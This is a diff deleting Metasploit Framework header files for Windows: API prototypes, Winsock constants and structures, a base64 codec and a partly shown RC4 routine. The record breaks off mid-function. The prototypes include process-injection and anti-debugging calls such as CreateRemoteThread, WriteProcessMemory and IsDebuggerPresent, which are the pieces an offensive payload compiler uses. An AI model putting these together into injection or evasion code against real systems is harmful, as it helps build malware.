-    ProcessTelemetryIdInformation                = 64,
-    ProcessCommitReleaseInformation              = 65,
-    ProcessReserved1Information                  = 66,
-    ProcessReserved2Information                  = 67,
-    ProcessSubsystemProcess                      = 68,
-    ProcessInPrivate                             = 70,
-    ProcessRaiseUMExceptionOnInvalidHandleClose  = 71,
-    MaxProcessInfoClass
-} PROCESSINFOCLASS;
-
-typedef enum _FINDEX_INFO_LEVELS { 
-  FindExInfoStandard,
-  FindExInfoBasic,
-  FindExInfoMaxInfoLevel
-} FINDEX_INFO_LEVELS;
-
-typedef enum _FINDEX_SEARCH_OPS { 
-  FindExSearchNameMatch,
-  FindExSearchLimitToDirectories,
-  FindExSearchLimitToDevices
-} FINDEX_SEARCH_OPS;
-
-WINAPI void OutputDebugString __attribute__((dllimport))(LPCTSTR);
-WINAPI HGLOBAL GlobalAlloc __attribute__((dllimport))(UINT, size_t);
-WINAPI LPVOID GlobalLock __attribute__((dllimport))(HGLOBAL);
-WINAPI BOOL GlobalUnlock __attribute__((dllimport))(HGLOBAL);
-WINAPI HGLOBAL GlobalReAlloc __attribute__((dllimport))(HGLOBAL, size_t, UINT);
-WINAPI HGLOBAL GlobalFree __attribute__((dllimport))(HGLOBAL);
-WINAPI DWORD GetLastError __attribute__((dllimport))(void);
-WINAPI LPVOID VirtualAlloc __attribute__((dllimport))(LPVOID, size_t, DWORD, DWORD);
-WINAPI LPVOID VirtualAllocEx __attribute__((dllimport))(HANDLE, LPVOID, size_t, DWORD, DWORD);
-WINAPI BOOL VirtualProtect __attribute__((dllimport))(LPVOID, size_t, DWORD, PDWORD);
-WINAPI BOOL VirtualProtectEx __attribute__((dllimport))(HANDLE, LPVOID, size_t, DWORD, PDWORD);
-WINAPI HANDLE GetProcessHeap __attribute__((dllimport))(void);
-WINAPI DWORD GetProcessHeaps __attribute__((dllimport))(DWORD, PHANDLE);
-WINAPI HANDLE HeapCreate __attribute__((dllimport))(DWORD, size_t, size_t);
-WINAPI LPVOID HeapAlloc __attribute__((dllimport))(HANDLE, DWORD, size_t);
-WINAPI size_t HeapSize __attribute__((dllimport))(HANDLE, DWORD, LPCVOID);
-WINAPI LPVOID HeapreAlloc __attribute__((dllimport))(HANDLE, DWORD, LPVOID, size_t);
-WINAPI BOOL HeapFree __attribute__((dllimport))(HANDLE, DWORD, LPVOID);
-WINAPI BOOL HeapQueryInformation __attribute__((dllimport))(HANDLE, HEAP_INFORMATION_CLASS, PVOID, size_t, PSIZE_T);
-WINAPI BOOL HeapSetInformation __attribute__((dllimport))(HANDLE, HEAP_INFORMATION_CLASS, PVOID, size_t);
-WINAPI BOOL VirtualFreeEx __attribute__((dllimport))(HANDLE, LPVOID, size_t, DWORD);
-WINAPI void MoveMemory __attribute__((dllimport))(PVOID, void*, size_t);
-WINAPI BOOL WriteProcessMemory __attribute__((dllimport))(HANDLE, LPVOID, LPCVOID, size_t, size_t*);
-WINAPI BOOL ReadProcessMemory __attribute__((dllimport))(HANDLE, LPCVOID, LPVOID, size_t, size_t*);
-WINAPI HANDLE CreateThread __attribute__((dllimport))(LPSECURITY_ATTRIBUTES, size_t, LPTHREAD_START_ROUTINE, LPVOID, DWORD, LPDWORD );
-WINAPI HANDLE CreateRemoteThread __attribute__((dllimport))(HANDLE, LPSECURITY_ATTRIBUTES, size_t, LPTHREAD_START_ROUTINE, LPVOID, DWORD, LPDWORD );
-WINAPI DWORD GetProcessId __attribute__((dllimport))(HANDLE);
-WINAPI BOOL CreateProcess __attribute__((dllimport))(LPCTSTR, LPTSTR, LPSECURITY_ATTRIBUTES, LPSECURITY_ATTRIBUTES, BOOL, DWORD, LPVOID, LPCTSTR, LPSTARTUPINFO, LPPROCESS_INFORMATION);
-WINAPI BOOL CreateProcessAsUser __attribute__((dllimport))(HANDLE, LPCTSTR, LPTSTR, LPSECURITY_ATTRIBUTES, LPSECURITY_ATTRIBUTES, BOOL, DWORD, LPVOID, LPCTSTR, LPSTARTUPINFO, LPPROCESS_INFORMATION);
-WINAPI HANDLE OpenProcess __attribute__((dllimport))(DWORD, BOOL, DWORD);
-WINAPI void ExitProcess __attribute__((dllimport))(UINT);
-WINAPI BOOL TerminateProcess __attribute__((dllimport))(UINT);
-WINAPI DWORD GetTickCount __attribute__((dllimport))(void);
-WINAPI void Sleep __attribute__((dllimport))(DWORD);
-WINAPI UINT WinExec __attribute__((dllimport))(LPCSTR, UINT);
-WINAPI DWORD WaitForSingleObject __attribute__((dllimport))(HANDLE, DWORD);
-WINAPI FARPROC GetProcAddress __attribute__((dllimport))(HMODULE, LPCSTR);
-WINAPI HMODULE LoadLibrary __attribute__((dllimport))(LPCTSTR);
-WINAPI HMODULE GetModuleHandle __attribute__((dllimport))(LPCTSTR);
-WINAPI HANDLE CreateFile __attribute__((dllimport))(LPCTSTR, DWORD, DWORD, LPSECURITY_ATTRIBUTES, DWORD, DWORD, HANDLE);
-WINAPI BOOL GetFileInformationByHandle __attribute__((dllimport))(HANDLE, LPBY_HANDLE_FILE_INFORMATION);
-WINAPI DWORD GetFullPathName __attribute__((dllimport))(LPCTSTR, DWORD, LPTSTR, LPTSTR*);
-WINAPI DWORD GetFileType __attribute__((dllimport))(HANDLE);
-WINAPI BOOL MoveFile __attribute__((dllimport))(LPCTSTR, LPCTSTR);
-WINAPI BOOL DeleteFile __attribute__((dllimport))(LPCTSTR);
-WINAPI BOOL CopyFile __attribute__((dllimport))(LPCTSTR, LPCTSTR, BOOL);
-WINAPI BOOL WriteFile __attribute__((dllimport))(HANDLE, LPCVOID, DWORD, LPDWORD, LPOVERLAPPED);
-WINAPI BOOL ReadFile __attribute__((dllimport))(HANDLE, LPVOID, DWORD, LPDWORD, LPOVERLAPPED);
-WINAPI BOOL ReadFileEx __attribute__((dllimport))(HANDLE, LPVOID, LPOVERLAPPED, LPOVERLAPPED_COMPLETION_ROUTINE);
-WINAPI DWORD GetFileSize __attribute__((dllimport))(HANDLE, LPDWORD);
-WINAPI DWORD GetTempPath __attribute__((dllimport))(DWORD, LPTSTR);
-WINAPI UINT GetTempFileName __attribute__((dllimport))(LPCTSTR, LPCTSTR, UINT, LPTSTR);
-WINAPI DWORD GetShortPathName __attribute__((dllimport))(LPCTSTR, LPTSTR, DWORD);
-WINAPI DWORD GetLongPathName __attribute__((dllimport))(LPCTSTR, LPTSTR, DWORD);
-WINAPI INT GetExpandedName __attribute__((dllimport))(LPTSTR, LPTSTR);
-WINAPI DWORD GetFinalPathNameByHandle __attribute__((dllimport))(HANDLE, LPTSTR, DWORD, DWORD);
-WINAPI BOOL LockFile __attribute__((dllimport))(HANDLE, DWORD, DWORD, DWORD, DWORD);
-WINAPI BOOL UnlockFile __attribute__((dllimport))(HANDLE, DWORD, DWORD, DWORD, DWORD);
-WINAPI BOOL UnlockFileEx __attribute__((dllimport))(HANDLE, DWORD, DWORD, DWORD, LPOVERLAPPED);
-WINAPI BOOL FreeLibrary __attribute__((dllimport))(HMODULE);
-WINAPI DWORD GetModuleFileName __attribute__((dllimport))(HMODULE, LPTSTR, DWORD);
-WINAPI BOOL CloseHandle __attribute__((dllimport))(HANDLE);
-WINAPI void DebugBreak __attribute__((dllimport))(void);
-WINAPI HWND FindWindow __attribute__((dllimport))(LPCTSTR, LPCTSTR);
-WINAPI HWND FindWindowEx __attribute__((dllimport))(HWND, HWND, LPCTSTR, LPCTSTR);
-WINAPI HWND GetWindow __attribute__((dllimport))(HWND, UINT);
-WINAPI HWND GetForegroundWindow __attribute__((dllimport))(void);
-WINAPI BOOL SetForegroundWindow __attribute__((dllimport))(HWND);
-WINAPI HWND GetDesktopWindow __attribute__((dllimport))(void);
-WINAPI HWND SetActiveWindow __attribute__((dllimport))(HWND);
-WINAPI BOOL IsWindowEnabled __attribute__((dllimport))(HWND);
-WINAPI HWND SetFocus __attribute__((dllimport))(HWND);
-WINAPI BOOL MoveWindow __attribute__((dllimport))(HWND, int, int, int, int, BOOL);
-WINAPI int MessageBox __attribute__((dllimport))(HWND, LPCTSTR, LPCTSTR, UINT);
-WINAPI BOOL Beep __attribute__((dllimport))(DWORD, DWORD);
-WINAPI BOOL CreateDirectory __attribute__((dllimport))(LPCTSTR, LPSECURITY_ATTRIBUTES);
-WINAPI HANDLE CreateFileMapping __attribute__((dllimport))(HANDLE, LPSECURITY_ATTRIBUTES, DWORD, DWORD, DWORD, LPCTSTR);
-WINAPI LPVOID MapViewOfFile __attribute__((dllimport))(HANDLE, DWORD, DWORD, DWORD, size_t);
-WINAPI LPVOID MapViewOfFileEx __attribute__((dllimport))(HANDLE, DWORD, DWORD, DWORD, size_t, LPVOID);
-WINAPI BOOL FindClose __attribute__((dllimport))(HANDLE);
-WINAPI HANDLE FindFirstFile __attribute__((dllimport))(LPCTSTR, LPWIN32_FIND_DATA);
-WINAPI HANDLE FindFirstFileEx __attribute__((dllimport))(LPCTSTR, FINDEX_INFO_LEVELS, LPVOID, FINDEX_SEARCH_OPS, LPVOID, DWORD);
-WINAPI BOOL FindNextFile __attribute__((dllimport))(HANDLE, LPWIN32_FIND_DATA);
-WINAPI HANDLE GetCurrentProcess __attribute__((dllimport))(void);
-WINAPI HANDLE GetCurrentThread __attribute__((dllimport))(void);
-WINAPI LRESULT CallNextHookEx __attribute__((dllimport))(HHOOK, int, WPARAM, LPARAM);
-WINAPI BOOL GetMessage __attribute__((dllimport))(LPMSG, HWND, UINT, UINT);
-WINAPI BOOL PostMessage __attribute__((dllimport))(HWND, UINT, WPARAM, LPARAM);
-WINAPI LRESULT SendMessage __attribute__((dllimport))(HWND, UINT, WPARAM, LPARAM);
-WINAPI SC_HANDLE OpenSCManager __attribute__((dllimport))(LPCTSTR, LPCTSTR, DWORD);
-WINAPI BOOL StartService __attribute__((dllimport))(SC_HANDLE, DWORD, LPCTSTR*);
-WINAPI BOOL SetServiceStatus __attribute__((dllimport))(SERVICE_STATUS_HANDLE, LPSERVICE_STATUS);
-WINAPI SC_HANDLE CreateService __attribute__((dllimport))(SC_HANDLE, LPCTSTR, LPCTSTR, DWORD, DWORD, DWORD, DWORD, LPCTSTR, LPCTSTR, LPDWORD, LPCTSTR, LPCTSTR, LPCTSTR);
-WINAPI SC_HANDLE OpenService __attribute__((dllimport))(SC_HANDLE, LPCTSTR, DWORD);
-WINAPI BOOL ChangeServiceConfig __attribute__((dllimport))(SC_HANDLE, DWORD, DWORD, DWORD, LPCTSTR, LPCTSTR, LPDWORD, LPCTSTR, LPCTSTR, LPCTSTR, LPCTSTR);
-WINAPI BOOL DeleteService __attribute__((dllimport))(SC_HANDLE);
-WINAPI BOOL EnumServicesStatus __attribute__((dllimport))(SC_HANDLE, DWORD, DWORD, LPENUM_SERVICE_STATUS, DWORD, LPDWORD, LPDWORD, LPDWORD);
-WINAPI BOOL EnumServicesStatusEx __attribute__((dllimport))(SC_HANDLE, SC_ENUM_TYPE, DWORD, DWORD, LPBYTE, DWORD, LPDWORD, LPDWORD, LPDWORD, LPCTSTR);
-WINAPI BOOL CloseServiceHandle __attribute__((dllimport))(SC_HANDLE);
-WINAPI BOOL ControlService __attribute__((dllimport))(SC_HANDLE, DWORD, LPSERVICE_STATUS);
-WINAPI BOOL GetServiceDisplayName __attribute__((dllimport))(SC_HANDLE, LPCTSTR, LPTSTR, LPDWORD);
-WINAPI BOOL GetServiceKeyName __attribute__((dllimport))(SC_HANDLE, LPCTSTR, LPTSTR, LPDWORD);
-WINAPI BOOL QueryServiceStatus __attribute__((dllimport))(SC_HANDLE, LPSERVICE_STATUS);
-WINAPI BOOL OpenClipboard __attribute__((dllimport))(HWND);
-WINAPI HANDLE SetClipboardData __attribute__((dllimport))(UINT, HANDLE);
-WINAPI HANDLE GetClipboardData __attribute__((dllimport))(UINT);
-WINAPI BOOL EmptyClipboard __attribute__((dllimport))(void);
-WINAPI BOOL CloseClipboard __attribute__((dllimport))(void);
-WINAPI LONG RegSetValueEx __attribute__((dllimport))(HKEY, LPCTSTR, DWORD, DWORD, const BYTE*, DWORD);
-WINAPI LONG RegOpenCurrentUser __attribute__((dllimport))(REGSAM, PHKEY);
-WINAPI LONG RegDeleteValue __attribute__((dllimport))(HKEY, LPCTSTR);
-WINAPI LONG RegOpenKey __attribute__((dllimport))(HKEY, LPCTSTR, PHKEY);
-WINAPI LONG RegQueryValueEx __attribute__((dllimport))(HKEY, LPCTSTR, LPDWORD, LPDWORD, LPBYTE, LPDWORD);
-WINAPI LONG RegCloseKey __attribute__((dllimport))(HKEY);
-WINAPI LONG RegCreateKeyEx __attribute__((dllimport))(HKEY, LPCTSTR, DWORD, LPTSTR, DWORD, REGSAM, LPSECURITY_ATTRIBUTES, PHKEY, LPDWORD);
-WINAPI HHOOK SetWindowHookEx __attribute__((dllimport))(int, HOOKPROC, HINSTANCE, DWORD);
-WINAPI BOOL UnhookWindowsHookEx __attribute__((dllimport))(HHOOK);
-WINAPI BOOL IsDebuggerPresent __attribute__((dllimport))(void);
-WINAPI BOOL CheckRemoteDebuggerPresent __attribute__((dllimport))(HANDLE, PBOOL);
-WINAPI NTSTATUS NtQueryInformationProcess __attribute__((dllimport))(HANDLE, PROCESSINFOCLASS, PVOID, ULONG, PULONG);
-WINAPI void SetLastError __attribute__((dllimport))(DWORD);
-WINAPI SERVICE_STATUS_HANDLE RegisterServiceCtrlHandler __attribute__((dllimport))(LPCSTR, LPHANDLER_FUNCTION);
-BOOL WINAPI StartServiceCtrlDispatcher __attribute__((dllimport))(LPSERVICE_TABLE_ENTRY);
-LPTSTR WINAPI GetCommandLine __attribute__((dllimport))(void);

data/headers/windows/Winsock2.h

@@ -1,331 +0,0 @@
-//
-// License:
-// https://github.com/rapid7/metasploit-framework/blob/master/LICENSE
-//
-
-#define IPPROTO_IP 0
-#define IPPROTO_ICMP 1
-#define IPPROTO_IGMP 2
-#define IPPROTO_GGP 3
-#define IPPROTO_TCP 6
-#define IPPROTO_PUP 12
-#define IPPROTO_UDP 17
-#define IPPROTO_IDP 22
-#define IPPROTO_ND  77
-#define IPPROTO_RAW 255
-#define IPPROTO_MAX 256
-#define IPPORT_ECHO 7
-#define IPPORT_DISCARD  9
-#define IPPORT_SYSTAT 11
-#define IPPORT_DAYTIME 13
-#define IPPORT_NETSTAT 15
-#define IPPORT_FTP 21
-#define IPPORT_TELNET 23
-#define IPPORT_SMTP 25
-#define IPPORT_TIMESERVER 37
-#define IPPORT_NAMESERVER 42
-#define IPPORT_WHOIS 43
-#define IPPORT_MTP 57
-#define IPPORT_TFTP 69
-#define IPPORT_RJE 77
-#define IPPORT_FINGER 79
-#define IPPORT_TTYLINK 87
-#define IPPORT_SUPDUP 95
-#define IPPORT_EXECSERVER 512
-#define IPPORT_LOGINSERVER 513
-#define IPPORT_CMDSERVER 514
-#define IPPORT_EFSSERVER 520
-#define IPPORT_BIFFUDP 512
-#define IPPORT_WHOSERVER 513
-#define IPPORT_ROUTESERVER 520
-#define IPPORT_RESERVED 1024
-#define IMPLINK_IP 155
-#define IMPLINK_LOWEXPER 156
-#define IMPLINK_HIGHEXPER 158
-#define WSADESCRIPTION_LEN 256
-#define WSASYS_STATUS_LEN 128
-#define SD_RECEIVE 0x00
-#define SD_SEND 0x01
-#define SD_BOTH 0x02
-#define FD_SETSIZE 64
-#define WSA_INVALID_HANDLE 6
-#define WSA_NOT_ENOUGH_MEMORY 8
-#define WSA_INVALID_PARAMETER 87
-#define WSA_OPERATION_ABORTED 995
-#define WSA_IO_INCOMPLETE 996
-#define WSA_IO_PENDING 997
-#define WSAEINTR 10004
-#define WSAEBADF 10009
-#define WSAEACCES 10013
-#define WSAEFAULT 10014
-#define WSAEINVAL 10022
-#define WSAEMFILE 10024
-#define WSAEWOULDBLOCK 10035
-#define WSAEINPROGRESS 10036
-#define WSAEALREADY 10037
-#define WSAENOTSOCK 10038
-#define WSAEDESTADDRREQ 10039
-#define WSAEMSGSIZE 10040
-#define WSAEPROTOTYPE 10041
-#define WSAENOPROTOOPT 10042
-#define WSAEPROTONOSUPPORT 10043
-#define WSAESOCKTNOSUPPORT 10044
-#define WSAEOPNOTSUPP 10045
-#define WSAEPFNOSUPPORT 10046
-#define WSAEAFNOSUPPORT 10047
-#define WSAEADDRINUSE 10048
-#define WSAEADDRNOTAVAIL 10049
-#define WSAENETDOWN 10050
-#define WSAENETUNREACH 10051
-#define WSAENETRESET 10052
-#define WSAECONNABORTED 10053
-#define WSAECONNRESET 10054
-#define WSAENOBUFS 10055
-#define WSAEISCONN 10056
-#define WSAENOTCONN 10057
-#define WSAESHUTDOWN 10058
-#define WSAETOOMANYREFS 10059
-#define WSAETIMEDOUT 10060
-#define WSAECONNREFUSED 10061
-#define WSAELOOP 10062
-#define WSAENAMETOOLONG 10063
-#define WSAEHOSTDOWN 10064
-#define WSAEHOSTUNREACH 10065
-#define WSAENOTEMPTY 10066
-#define WSAEPROCLIM 10067
-#define WSAEUSERS 10068
-#define WSAEDQUOT 10069
-#define WSAESTALE 10070
-#define WSAEREMOTE 10071
-#define WSASYSNOTREADY 10091
-#define WSAVERNOTSUPPORTED 10092
-#define WSANOTINITIALISED 10093
-#define WSAEDISCON 10101
-#define WSAENOMORE 10102
-#define WSAECANCELLED 10103
-#define WSAEINVALIDPROCTABLE 10104
-#define WSAEINVALIDPROVIDER 10105
-#define WSAEPROVIDERFAILEDINIT 10106
-#define WSASYSCALLFAILURE 10107
-#define WSASERVICE_NOT_FOUND 10108
-#define WSATYPE_NOT_FOUND 10109
-#define WSA_E_NO_MORE 10110
-#define WSA_E_CANCELLED 10111
-#define WSAEREFUSED 10112
-#define WSAHOST_NOT_FOUND 11001
-#define WSATRY_AGAIN 11002
-#define WSANO_RECOVERY 11003
-#define WSANO_DATA 11004
-#define WSA_QOS_RECEIVERS 11005
-#define WSA_QOS_SENDERS 11006
-#define WSA_QOS_NO_SENDERS 11007
-#define WSA_QOS_NO_RECEIVERS 11008
-#define WSA_QOS_REQUEST_CONFIRMED 11009
-#define WSA_QOS_ADMISSION_FAILURE 11010
-#define WSA_QOS_POLICY_FAILURE 11011
-#define WSA_QOS_BAD_STYLE 11012
-#define WSA_QOS_BAD_OBJECT 11013
-#define WSA_QOS_TRAFFIC_CTRL_ERROR 11014
-#define WSA_QOS_GENERIC_ERROR 11015
-#define WSA_QOS_ESERVICETYPE 11016
-#define WSA_QOS_EFLOWSPEC 11017
-#define WSA_QOS_EPROVSPECBUF 11018
-#define WSA_QOS_EFILTERSTYLE 11019
-#define WSA_QOS_EFILTERTYPE 11020
-#define WSA_QOS_EFILTERCOUNT 11021
-#define WSA_QOS_EOBJLENGTH 11022
-#define WSA_QOS_EFLOWCOUNT 11023
-#define WSA_QOS_EUNKOWNPSOBJ 11024
-#define WSA_QOS_EPOLICYOBJ 11025
-#define WSA_QOS_EFLOWDESC 11026
-#define WSA_QOS_EPSFLOWSPEC 11027
-#define WSA_QOS_EPSFILTERSPEC 11028
-#define WSA_QOS_ESDMODEOBJ 11029
-#define WSA_QOS_ESHAPERATEOBJ 11030
-#define WSA_QOS_RESERVED_PETYPE 11031
-#define AF_UNSPEC 0
-#define AF_INET 2
-#define AF_IPX 6
-#define AF_APPLETALK 16
-#define AF_NETBIOS 17
-#define AF_INET6 23
-#define AF_IRDA 26
-#define AF_BTH 32
-#define SOCK_STREAM 1
-#define SOCK_DGRAM 2
-#define SOCK_RAW 3
-#define SOCK_RDM 4
-#define SOCK_SEQPACKET 5
-#define INVALID_SOCKET  (SOCKET)(~0)
-#define SOCKET_ERROR (-1)
-#define AI_PASSIVE                  0x00000001
-#define AI_CANONNAME                0x00000002
-#define AI_NUMERICHOST              0x00000004
-#define AI_NUMERICSERV              0x00000008
-#define AI_ALL                      0x00000100
-#define AI_ADDRCONFIG               0x00000400
-#define AI_V4MAPPED                 0x00000800
-#define AI_NON_AUTHORITATIVE        0x00004000
-#define AI_SECURE                   0x00008000
-#define AI_RETURN_PREFERRED_NAMES   0x00010000
-#define AI_FQDN                     0x00020000
-#define AI_FILESERVER               0x00040000
-#define MAX_PROTOCOL_CHAIN 7
-#define WSAPROTOCOL_LEN  255
-#define SOMAXCONN 0x7fffffff
-
-typedef unsigned char u_char;
-typedef unsigned short u_short;
-typedef unsigned int u_int;
-typedef unsigned long u_long;
-typedef u_int SOCKET;
-typedef unsigned int GROUP;
-typedef ULONG SERVICETYPE;
-
-struct sockaddr {
-  u_short sa_family;
-  char  sa_data[14];
-} SOCKADDR;
-
-typedef struct WSAData {
-  WORD           wVersion;
-  WORD           wHighVersion;
-  char           szDescription[WSADESCRIPTION_LEN+1];
-  char           szSystemStatus[WSASYS_STATUS_LEN+1];
-  unsigned short iMaxSockets;
-  unsigned short iMaxUdpDg;
-  char       *lpVendorInfo;
-} WSADATA, *LPWSADATA;
-
-typedef struct addrinfo {
-  int             ai_flags;
-  int             ai_family;
-  int             ai_socktype;
-  int             ai_protocol;
-  size_t          ai_addrlen;
-  char            *ai_canonname;
-  struct sockaddr  *ai_addr;
-  struct addrinfo  *ai_next;
-} ADDRINFOA, *PADDRINFOA;
-
-typedef struct fd_set {
-  u_int  fd_count;
-  SOCKET fd_array[FD_SETSIZE];
-} fd_set;
-
-typedef struct in_addr {
-  union {
-    struct {
-      u_char s_b1,s_b2,s_b3,s_b4;
-    } S_un_b;
-    struct {
-      u_short s_w1,s_w2;
-    } S_un_w;
-    u_long S_addr;
-  } S_un;
-} IN_ADDR, *PIN_ADDR, *LPIN_ADDR;
-
-struct sockaddr_in {
-  short sin_family;
-  u_short sin_port;
-  struct in_addr sin_addr;
-  char sin_zero[8];
-};
-
-struct sockproto {
-  u_short sp_family;
-  u_short sp_protocol;
-};
-
-typedef struct hostent {
-  char *h_name;
-  char **h_aliases;
-  short h_addrtype;
-  short h_length;
-  char **h_addr_list;
-} HOSTENT, *PHOSTENT, *LPHOSTENT;
-
-typedef struct _WSAPROTOCOLCHAIN {
-  int ChainLen;
-  DWORD ChainEntries[MAX_PROTOCOL_CHAIN];
-} WSAPROTOCOLCHAIN, *LPWSAPROTOCOLCHAIN;
-
-typedef struct _WSAPROTOCOL_INFO {
-  DWORD            dwServiceFlags1;
-  DWORD            dwServiceFlags2;
-  DWORD            dwServiceFlags3;
-  DWORD            dwServiceFlags4;
-  DWORD            dwProviderFlags;
-  GUID             ProviderId;
-  DWORD            dwCatalogEntryId;
-  WSAPROTOCOLCHAIN ProtocolChain;
-  int              iVersion;
-  int              iAddressFamily;
-  int              iMaxSockAddr;
-  int              iMinSockAddr;
-  int              iSocketType;
-  int              iProtocol;
-  int              iProtocolMaxOffset;
-  int              iNetworkByteOrder;
-  int              iSecurityScheme;
-  DWORD            dwMessageSize;
-  DWORD            dwProviderReserved;
-  TCHAR            szProtocol[WSAPROTOCOL_LEN+1];
-} WSAPROTOCOL_INFO, *LPWSAPROTOCOL_INFO;
-
-typedef struct _WSABUF
-{
-  ULONG len;
-  CHAR* buf;
-} WSABUF, *LPWSABUF;
-
-typedef struct _FLOWSPEC {
-  unsigned int      TokenRate;
-  unsigned int      TokenBucketSize;
-  unsigned int      PeakBandwidth;
-  unsigned int      Latency;
-  unsigned int      DelayVariation;
-  SERVICETYPE       ServiceType;
-  unsigned int      MaxSduSize;
-  unsigned int      MinimumPolicedSize;
-} FLOWSPEC, *PFLOWSPEC, *LPFLOWSPEC;
-
-typedef struct _QUALITYOFSERVICE {
-  FLOWSPEC           SendingFlowspec;
-  FLOWSPEC           ReceivingFlowspec;
-  WSABUF             ProviderSpecific;
-} QOS, *LPQOS;
-
-typedef int (CALLBACK *LPCONDITIONPROC)(LPWSABUF, LPWSABUF, LPQOS, LPQOS, LPWSABUF, LPWSABUF, GROUP *, DWORD);
-typedef struct sockaddr_in SOCKADDR_IN;
-typedef struct sockaddr_in *PSOCKADDR_IN;
-typedef struct sockaddr_in *LPSOCKADDR_IN;
-
-WINAPI int WSAStartup __attribute__((dllimport))(WORD, LPWSADATA);
-WINAPI int WSACleanup __attribute__((dllimport))();
-WINAPI int getaddrinfo __attribute__((dllimport))(PCSTR, PCSTR, const ADDRINFOA*, PADDRINFOA*);
-WINAPI SOCKET socket __attribute__((dllimport))(int, int, int);
-WINAPI void freeaddrinfo __attribute__((dllimport))(struct addrinfo*);
-WINAPI int closesocket __attribute__((dllimport))(SOCKET);
-WINAPI int bind __attribute__((dllimport))(SOCKET, const struct sockaddr*, int);
-WINAPI SOCKET accept __attribute__((dllimport))(SOCKET, struct sockaddr*, int*);
-WINAPI BOOL AcceptEx __attribute__((dllimport))(SOCKET, SOCKET, PVOID, DWORD, DWORD, DWORD, LPDWORD, LPOVERLAPPED);
-WINAPI int connect __attribute__((dllimport))(SOCKET, const struct sockaddr*, int);
-WINAPI int gethostname __attribute__((dllimport))(char*, int);
-WINAPI int listen __attribute__((dllimport))(SOCKET, int);
-WINAPI int recv __attribute__((dllimport))(SOCKET, char*, int, int);
-WINAPI int recvfrom __attribute__((dllimport))(SOCKET, char*, int, int, struct sockaddr*, int*);
-WINAPI int send __attribute__((dllimport))(SOCKET, char*, int, int);
-WINAPI int sendto __attribute__((dllimport))(SOCKET, char*, int, int, const struct sockaddr*, int);
-WINAPI int select __attribute__((dllimport))(int, fd_set*, fd_set*, fd_set*, const struct timeval*);
-WINAPI int setsockopt __attribute__((dllimport))(SOCKET, int, int, const char*, int);
-WINAPI char* inet_ntoa __attribute__((dllimport))(struct in_addr);
-WINAPI unsigned long inet_addr __attribute__((dllimport))(const char*);
-WINAPI int shutdown __attribute__((dllimport))(SOCKET, int);
-WINAPI u_short htons __attribute__((dllimport))(u_short);
-WINAPI u_long htonl __attribute__((dllimport))(u_long);
-WINAPI struct hostent* gethostbyname __attribute__((dllimport))(const char*);
-WINAPI struct hostent* gethostbyaddr __attribute__((dllimport))(const char*, int, int);
-WINAPI int WSAGetLastError __attribute__((dllimport))();
-WINAPI SOCKET WSASocket __attribute__((dllimport))(int, int, int, LPWSAPROTOCOL_INFO, GROUP, DWORD);
-WINAPI SOCKET WSAAccept __attribute__((dllimport))(SOCKET, struct sockaddr*, LPINT, LPCONDITIONPROC, DWORD_PTR);

data/headers/windows/base64.h

@@ -1,114 +0,0 @@
-/* from https://github.com/mdornseif/didentd */
-/* public domain
- * BASE64 on stdin -> converted data on stdout */
-
-/* arbitrary data on stdin -> BASE64 data on stdout
- * UNIX's newline convention is used, i.e. one ASCII control-j (10 decimal).
- *
- * public domain
- */
-
-/* Hacked by drt@un.bewaff.net to be a library function working on memory blocks
- *
- */
-
-static unsigned char alphabet[64] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
-
-int base64decode(char *dest, const char *src, int l)
-{
-  static char inalphabet[256], decoder[256];
-  static bool table_initialized = false;
-  int i, bits, c, char_count;
-  int rpos;
-  int wpos = 0;
-
-  if (!table_initialized) {
-    for (i = (sizeof alphabet) - 1; i >= 0; i--) {
-      inalphabet[alphabet[i]] = 1;
-      decoder[alphabet[i]] = i;
-    }
-    table_initialized = true;
-  }
-
-  char_count = 0;
-  bits = 0;
-  for (rpos = 0; rpos < l; rpos++) {
-    c = src[rpos];
-
-    if (c == '=') {
-      break;
-    }
-
-    if (c > 255 || !inalphabet[c]) {
-      return -1;
-    }
-
-    bits += decoder[c];
-    char_count++;
-    if (char_count < 4) {
-      bits <<= 6;
-    } else {
-      dest[wpos++] = bits >> 16;
-      dest[wpos++] = (bits >> 8) & 0xff;
-      dest[wpos++] = bits & 0xff;
-      bits = 0;
-      char_count = 0;
-    }
-  }
-
-  switch (char_count) {
-  case 1:
-    return -1;
-    break;
-  case 2:
-    dest[wpos++] = bits >> 10;
-    break;
-  case 3:
-    dest[wpos++] = bits >> 16;
-    dest[wpos++] = (bits >> 8) & 0xff;
-    break;
-  }
-
-  return wpos;
-}
-
-int base64encode(char *dest, const char *src, int l)
-{
-  int bits, c, char_count;
-  int rpos;
-  int wpos = 0;
-
-  char_count = 0;
-  bits = 0;
-
-  for (rpos = 0; rpos < l; rpos++) {
-    c = src[rpos];
-
-    bits += c;
-    char_count++;
-    if (char_count < 3) {
-      bits <<= 8;
-    } else {
-      dest[wpos++] = alphabet[bits >> 18];
-      dest[wpos++] = alphabet[(bits >> 12) & 0x3f];
-      dest[wpos++] = alphabet[(bits >> 6) & 0x3f];
-      dest[wpos++] = alphabet[bits & 0x3f];
-      bits = 0;
-      char_count = 0;
-    }
-  }
-
-  if (char_count != 0) {
-    bits <<= 16 - (8 * char_count);
-    dest[wpos++] = alphabet[bits >> 18];
-    dest[wpos++] = alphabet[(bits >> 12) & 0x3f];
-    if (char_count == 1) {
-      dest[wpos++] = '=';
-      dest[wpos++] = '=';
-    } else {
-      dest[wpos++] = alphabet[(bits >> 6) & 0x3f];
-      dest[wpos++] = '=';
-    }
-  }
-  return wpos;
-}

data/headers/windows/rc4.h

@@ -1,54 +0,0 @@
-//
-// License:
-// https://github.com/rapid7/metasploit-framework/blob/master/LICENSE
-//
-
-// This code was originally obtained and modified from the following source
-// by Bobin Verton:
-// https://gist.github.com/rverton/a44fc8ca67ab9ec32089
-
-#define N 256   // 2^8
-
-void swap(unsigned char *a, unsigned char *b) {
-  int tmp = *a;
-  *a = *b;
-  *b = tmp;
-}
-
-int KSA(char *key, unsigned char *S) {
-  int len = strlen(key);
-  int j = 0;
-
-  for (int i = 0; i < N; i++) {
-    S[i] = i;
-  }
-
-  for (int i = 0; i < N; i++) {
-    j = (j + S[i] + key[i % len]) % N;
-    swap(&S[i], &S[j]);
-  }
-
-  return 0;
-}
-
-int PRGA(unsigned char *S, char *plaintext, unsigned char *ciphertext, int plainTextSize) {
-  int i = 0;
-  int j = 0;
-
-  for (size_t n = 0, len = plainTextSize; n < len; n++) {
-    i = (i + 1) % N;
-    j = (j + S[i]) % N;
-    swap(&S[i], &S[j]);
